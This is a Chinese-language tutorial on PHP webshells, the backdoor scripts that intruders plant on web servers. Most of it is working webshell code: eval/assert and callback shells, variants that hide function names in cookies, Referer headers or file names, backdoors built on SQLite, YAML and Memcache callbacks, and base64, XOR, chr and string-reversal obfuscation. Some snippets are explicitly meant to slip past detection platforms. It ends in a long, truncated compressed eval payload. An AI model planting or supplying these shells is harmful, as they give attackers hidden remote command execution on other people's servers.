关于PHP中的webshell
一、webshell简介
webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。
顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现,也有人称之为网站的后门工具。
二、webshell分类
1、eval
接受一个参数,将字符串作为PHP代码执行
eval($_POST[1]);
2、assert
一般接受一个参数,php 5.4.8版本后可以接受两个参数
assert($_REQUEST[l])
3、正则匹配类
preg_replace/ mb_ereg_replace/preg_filter等
4、文件包含类
include/include_once/require/require_once/file_get_contents
5、回调函数
call_user_func
call_user_func(‘assert‘, $_REQUEST[‘pass‘]); //或者 $e = $_REQUEST[‘e‘]; $arr = array($_POST[‘pass‘],); array_filter($arr, base64_decode($e))
三、webshell变种
assert 和 eval 基本上都被用烂了,分分钟就被检查出来了,所以网上有很多种变种,可以做后门的函数一般包含以下几个关键词:1、 callable 2、mixed $options 3、callback 4、handler
下面是具体的变种,更具隐蔽性
1、无明显回调
ob_start(‘assert‘); echo $_REQUEST[‘pass‘]; ob_end_flush();
2、单个参数
$e = $_REQUEST[‘e‘]; register_shutdown_function($e, $_REQUEST[‘pass‘]);
或者
$e = $_REQUEST[‘e‘]; declare(ticks=1); register_tick_function ($e, $_REQUEST[‘pass‘]);
或者
filter_var($_REQUEST[‘pass‘], FILTER_CALLBACK, array(‘options‘ => ‘assert‘)); filter_var_array(array(‘test‘ => $_REQUEST[‘pass‘]), array(‘test‘ => array(‘filter‘ => FILTER_CALLBACK, ‘options‘ => ‘assert‘)));
只要指定过滤方法为回调(FILTER_CALLBACK),且option为assert即可。
3、回调函数
call_user_func(‘assert‘, $_REQUEST[‘pass‘]); call_user_func_array(‘assert‘, array($_REQUEST[‘pass‘]));
或者
<?php error_reporting(0); if ($_REQUEST[‘session‘] == 1) { $session = chr(97) . chr(115) . chr(115) . chr(101) . chr(114) . chr(116); //assert // open第一个被调用,类似 类的构造函数 function open($save_path, $session_name) { } // close最后一个被调用,类似 类的析构函数 function close() { } // 得到session id后,等价于执行assert($_REQUEST[phpcms]) session_id($_REQUEST[phpcms]); function write($id, $sess_data) { } function destroy($id) { } function gc() { } // 第三个参数为read read(string $sessionId) session_set_save_handler("open", "close", $session, "write", "destroy", "gc"); @session_start(); //会话打开的时候,自动调用回调函数 $cloud = $_SESSION["d"] = "c"; // 这句话没用 } ?>
4、数组
$e = $_REQUEST[‘e‘]; $arr = array($_POST[‘pass‘],); array_filter($arr, base64_decode($e))
或者
$e = $_REQUEST[‘e‘]; $arr = array($_POST[‘pass‘],); array_map(base64_decode($e), $arr);
或者
$pass= "LandGrey"; array_udiff_assoc(array($_REQUEST[$pass]), array(1), "assert");
或者
$pass= "LandGrey"; $ch = explode(".","hello.ass.world.er.t"); array_intersect_ukey(array($_REQUEST[$pass] => 1), array(1), $ch[1].$ch[3].$ch[4]);
或者
$_clasc = $_REQUEST[‘mod‘]; $arr = array($_POST[‘bato‘] => ‘|.*|e‘,); @array_walk_recursive($arr, $_clasc, ‘‘);
5、把部分信息放在代码以外
比如:脚本名称、header 中
$password = "LandGrey"; $key = substr(__FILE__,-5,-4); ${"LandGrey"} = $key."Land!"; $f = pack("H*", "13"."3f120b1655") ^ $LandGrey; array_intersect_uassoc (array($_REQUEST[$password] => ""), array(1), $f);
将脚本命名为scanner.php, 硬编码脚本最后一位字符为"r",就不会被平台检测到
或者
$password = "LandGrey"; $ch = $_COOKIE["set-domain-name"]; array_intersect_ukey(array($_REQUEST[$password] => 1), array(1), $ch."ert");
Cookie: set-domain-name=ass;
或者
$password = "LandGrey"; $wx = substr($_SERVER["HTTP_REFERER"],-7,-4); forward_static_call_array($wx."ert", array($_REQUEST[$password]));
Referer: http%3a//www.target.com/ass.php
6、数据库操作与第三方库中的回调后门
$e = $_REQUEST[‘e‘]; $db = new PDO(‘sqlite:sqlite.db3‘); $db->sqliteCreateFunction(‘myfunc‘, $e, 1); $sth = $db->prepare("SELECT myfunc(:exec)"); $sth->execute(array(‘:exec‘ => $_REQUEST[‘pass‘]));
可以注册一个sqlite函数,使之与assert功能相同。当执行这个sql语句的时候,就等于执行了assert
$str = urlencode($_REQUEST[‘pass‘]); $yaml = <<<EOD greeting: !{$str} "|.+|e" EOD; $parsed = yaml_parse($yaml, 0, $cnt, array("!{$_REQUEST[‘pass‘]}" => ‘preg_replace‘));
上面是使用php_yaml
$mem = new Memcache(); $re = $mem->addServer(‘localhost‘, 11211, TRUE, 100, 0, -1, TRUE, create_function(‘$a,$b,$c,$d,$e‘, ‘return assert($a);‘)); $mem->connect($_REQUEST[‘pass‘], 11211, 0);
还有php_memcached
7、反射
<?php /** * eva * l($_POS * T["c"]); * asse * rt */ class TestClass { } $rc = new ReflectionClass(‘TestClass‘); $str = $rc->getDocComment(); $payload = substr($str,strpos($str,‘ev‘),3); $payload .= substr($str,strpos($str,‘l(‘),7); $payload .= substr($str,strpos($str,‘T[‘),8); $exe = substr($str, strpos($str, ‘as‘), 4); $exe .= substr($str, strpos($str, ‘rt‘), 2); $exe($payload); ?>
四、隐藏关键词
1、混淆
<?php //pwd=addimg $sss = "ZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lnS0NCcGMzTmxkQ2dnSkY5U1JWRlZSVk5VV3lkd1lYTnpKMTBnS1NsN1FHVjJZV3dvSUdKaGMyVTJORjlrWldOdlpHVW9JQ1JmVWtWUlZVVlRWRnNuY0dGemN5ZGRJQ2tnS1R0OVpXeHpaWHRBWlhaaGJDZ2dKRjlTUlZGVlJWTlVXeWRoWkdScGJXY25YU0FwTzMwPSIpKQ=="; function CheckSQL( &$val ){ $v = "select|update|union|set|where|order|and|or"; $val = base64_decode( $val ); } CheckSQL( $sss ); preg_replace(‘/uploadsafe.inc.php/e‘,‘@‘.$sss, ‘uploadsafe.inc.php‘); ?>
或者
<?php $MMIC= $_GET[‘tid‘]?$_GET[‘tid‘]:$_GET[‘fid‘]; if($MMIC >1000000){ die(‘404‘); } if (isset($_POST["\x70\x61\x73\x73"]) && isset($_POST["\x63\x68\x65\x63\x6b"])) { $__PHP_debug = array ( ‘ZendName‘ => ‘70,61,73,73‘, ‘ZendPort‘ => ‘63,68,65,63,6b‘, ‘ZendSalt‘ => ‘792e19812fafd57c7ac150af768d95ce‘ ); $__PHP_replace = array ( pack(‘H*‘, join(‘‘, explode(‘,‘, $__PHP_debug[‘ZendName‘]))), pack(‘H*‘, join(‘‘, explode(‘,‘, $__PHP_debug[‘ZendPort‘]))), $__PHP_debug[‘ZendSalt‘] ); $__PHP_request = &$_POST; $__PHP_token = md5($__PHP_request[$__PHP_replace[0]]); if ($__PHP_token == $__PHP_replace[2]) { $__PHP_token = preg_replace ( chr(47).$__PHP_token.chr(47).chr(101), $__PHP_request[$__PHP_replace[1]], $__PHP_token ); unset ( $__PHP_debug, $__PHP_replace, $__PHP_request, $__PHP_token ); if(!defined(‘_DEBUG_TOKEN‘)) exit (‘Get token fail!‘); } }
2、反引号
<?php $cmd =base64_decode(‘dmVy=‘); // ver echo `$cmd`. `$_GET[username]`; // ``反引号的作用相当于shell_exec,执行系统命令 //或 $var = `net user`; echo "$var"; ?>
3、XOR
<?php @$_++; // $_ = 1 $__=("#"^"|"); // $__ = _ $__.=("."^"~"); // _P $__.=("/"^"`"); // _PO $__.=("|"^"/"); // _POS $__.=("{"^"/"); // _POST ${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]); ?>
4、加号
<?php $num = +""; $num++; $num++; $num++; $num++; $four = $num; // 4 $num++; $num++; $six = $num; // 6 $_=""; $_[+$_]++; // +""为0 $_=$_.""; // $_为字符串"Array" $___=$_[+""];//A $____=$___; $____++;//B $_____=$____; $_____++;//C $______=$_____; $______++;//D $_______=$______; $_______++;//E $________=$_______; $________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;//O $_________=$________; $_________++;$_________++;$_________++;$_________++;//S $_=$____.$___.$_________.$_______.$six.$four.‘_‘.$______.$_______.$_____.$________.$______.$_______; $________++;$________++;$________++;//R $_____=$_________; $_____++;//T $__=$___.$_________.$_________.$_______.$________.$_____; $__($_("ZXZhbCgkX1BPU1RbY21kXSk=")); //ASSERT(BASE64_DECODE("ZXZhbCgkX1BPU1RbY21kXSk=")); //ASSERT(eval($_POST[cmd])); ?>
5、函数
<?php $a=@strrev(ecalper_gerp); $b=@strrev(edoced_46esab); echo @$a($b(L3h4L2Ug),$_POST[jc],axxa); // /xx/e ?>
6、chr
<?php assert(chr(97).chr(115).chr(115).chr(101).chr(114).chr(116).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(120).chr(93).chr(41)); // chr解出来是assert($_POST[x]),不能替换成eval(chr(97).chr(115) ?>
7、session_set_save_handler
<?php error_reporting(0); if ($_REQUEST[‘session‘] == 1) { $session = chr(97) . chr(115) . chr(115) . chr(101) . chr(114) . chr(116); //assert // open第一个被调用,类似 类的构造函数 function open($save_path, $session_name) { } // close最后一个被调用,类似 类的析构函数 function close() { } // 得到session id后,等价于执行assert($_REQUEST[phpcms]) session_id($_REQUEST[phpcms]); function write($id, $sess_data) { } function destroy($id) { } function gc() { } // 第三个参数为read read(string $sessionId) session_set_save_handler("open", "close", $session, "write", "destroy", "gc"); @session_start(); //会话打开的时候,自动调用回调函数 $cloud = $_SESSION["d"] = "c"; // 这句话没用 } ?>
8、引号
<?php $LMsW="p"."r"."e"."g"."_r"."epl"."a"."ce"; $LMsW("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x75\x6E\x63\x6F\x6D\x70\x72\x65\x73\x73\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28‘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